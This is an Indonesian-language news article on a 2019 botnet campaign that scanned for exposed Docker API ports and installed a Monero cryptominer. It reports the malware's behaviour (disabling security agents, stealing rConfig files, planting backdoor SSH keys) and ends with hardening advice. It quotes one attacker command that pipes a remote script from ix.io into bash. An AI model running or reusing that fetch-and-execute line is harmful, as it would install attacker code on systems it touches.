idNSA.id - Hampir tahun 2020 dan beberapa sysadmin masih meninggalkan port admin Docker terbuka di internet.
Grup peretas saat ini memindai secara massal internet untuk mencari platform Docker yang memiliki API endpoint online. Tujuan dari pemindaian ini adalah untuk memungkinkan kelompok peretas mengirimkan perintah ke instance Docker dan menggunakan cryptocurrency miner pada instance Docker perusahaan, untuk menghasilkan dana untuk keuntungan grup sendiri.
Operasi pemindaian massal khusus ini dimulai pada akhir pekan, pada tanggal 24 November, dan segera menonjol karena ukurannya yang tipis.
"Pengguna Bad Packet CTI API akan mencatat bahwa aktivitas eksploitasi yang menargetkan instance Docker yang terpapar bukanlah hal yang baru dan sering terjadi," Troy Mursch, chief research officer dan co-founder Bad Packets LLC, mengatakan kepada ZDNet.
"Apa yang membedakan kampanye ini adalah peningkatan besar dalam aktivitas pemindaian. Ini membutuhkan penyelidikan lebih lanjut untuk mengetahui apa yang sedang dilakukan botnet ini," katanya.
Apa yang kita ketahui sejauh ini adalah bahwa kelompok di balik serangan ini sedang memindai lebih dari 59.000 jaringan IP (netblock) untuk mencari contoh Docker yang terbuka.
Setelah grup mengidentifikasi host yang terbuka, penyerang menggunakan titik akhir API untuk memulai wadah Alpine Linux OS di mana mereka menjalankan perintah berikut:
chroot / mnt / bin / sh -c 'curl -sL4 http://ix.io/1XQa | bash;
Perintah di atas mengunduh dan menjalankan skrip Bash dari server penyerang. Script ini menginstal penambang cryptocurrency XMRRig klasik. Dalam dua hari sejak kampanye ini aktif, para peretas telah menambang 14,82 koin Monero (XMR), nilainya lebih dari $ 740, kata Mursch.
Selain itu, operasi malware ini juga dilengkapi dengan langkah pertahanan diri.
"Salah satu fungsi kampanye yang tidak orisinal tetapi menarik adalah bahwa ia menghapus instalan agen pemantau yang diketahui dan membunuh banyak proses melalui skrip yang diunduh dari http: // ix [.] Io / 1XQh," kata Mursch kepada ZDnet.
Melihat melalui skrip ini, kita tidak hanya melihat bahwa peretas mematikan produk keamanan, tetapi mereka juga mematikan proses yang terkait dengan bot penambangan cryptocurrency saingan, seperti DDG.
Selain itu, Mursch juga menemukan fungsi skrip berbahaya yang memindai host yang terinfeksi untuk file konfigurasi rConfig, yang dienkripsi dan dicuri, mengirim file kembali ke perintah grup dan server kontrol.
Lebih lanjut, Craig H. Rowland, pendiri Sandfly Security, juga memperhatikan bahwa peretas juga membuat akun backdoor pada wadah yang diretas, dan meninggalkan key SSH untuk akses yang lebih mudah, dan cara untuk mengendalikan semua bot yang terinfeksi dari lokasi yang jauh.
Untuk saat ini, Mursch merekomendasikan agar pengguna dan organisasi yang menjalankan instance Docker segera memeriksa apakah mereka mengekspos endpoint API di internet, menutup port, dan kemudian menghentikan wadah yang berjalan yang tidak dikenal.
foto cover : ZDnet
